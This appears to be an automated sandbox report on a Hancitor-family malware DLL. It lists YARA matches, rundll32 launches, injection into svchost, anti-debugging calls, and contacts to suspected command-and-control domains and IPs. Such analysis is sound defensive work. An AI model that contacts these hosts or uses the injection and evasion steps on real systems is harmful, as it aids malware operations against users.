                  Source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winDLL@19/2@11/5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,closesocket,
                  Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
                  Source: niberius.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
                  Source: niberius.dllVirustotal: Detection: 9%
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\niberius.dll'
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,More
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,More
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: niberius.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: niberius.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: niberius.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: niberius.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: niberius.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: niberius.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: niberius.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.488380273.0000000002E7D000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.488557122.000000000445D000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.488753613.0000000004BCD000.00000002.00020000.sdmp, niberius.dll
                  Source: niberius.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: niberius.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: niberius.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: niberius.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: niberius.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E53580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
                  Source: niberius.dllStatic PE information: real checksum: 0x51bd7 should be: 0x508c3
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5CB68 push ebp; iretd
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6B8E9 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5E8BF push esp; iretd
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7C024 push ds; retf
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5D829 push ebp; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5E006 push ds; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5A964 push edi; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6FF35 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5CCC8 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5A55A push eax; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8F2CF push edx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8D5E0 push eax; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8D561 push eax; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E90903 push ecx; retf
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00435E20 push dword ptr [eax+04h]; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443CCC8 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443A55A push eax; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444FF35 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443E006 push ds; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445C024 push ds; retf
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443D829 push ebp; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444B8E9 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443E8BF push esp; iretd
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443A964 push edi; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443CB68 push ebp; iretd
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0446F2CF push edx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0446D561 push eax; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04470903 push ecx; retf
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0446D5E0 push eax; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BACCC8 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BAA55A push eax; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E53400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E69B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E53580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8E556 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8E8AD mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8E08C push dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8E485 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0446E556 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0446E485 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0446E08C push dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BDE556 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BDE08C push dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BDE485 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E51390 GetProcessHeap,HeapAlloc,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E69B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7368A __decode_pointer,SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E73668 SetUnhandledExceptionFilter,__encode_pointer,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040115C SetUnhandledExceptionFilter,exit,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00401150 SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004013C9 SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04453668 SetUnhandledExceptionFilter,__encode_pointer,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445368A __decode_pointer,SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04449B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC368A __decode_pointer,SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC3668 SetUnhandledExceptionFilter,__encode_pointer,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BBE1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BBB328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BB9B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pospvisis.com
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 23.21.173.155 80
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.222.42.67 80
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 8.211.241.0 80
                  Source: C:\Windows\SysWOW64\rundll32.exeDomain query: sudepallon.com
                  Source: C:\Windows\SysWOW64\rundll32.exeDomain query: srand04rf.ru
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 23.21.224.49 80
                  Source: C:\Windows\SysWOW64\rundll32.exeDomain query: api.ipify.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.213.179.67 80
                  Contains functionality to inject threads in other processesShow sources
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E53880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04433880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BA3880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E78BC2 cpuid
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: DialogBoxIndirectParamAorW,GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,GetMessageW,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,MonitorFromWindow,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,SetDeskWallpaper,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,CheckDlgButton,__invoke_watson,___crtGetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,closesocket,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
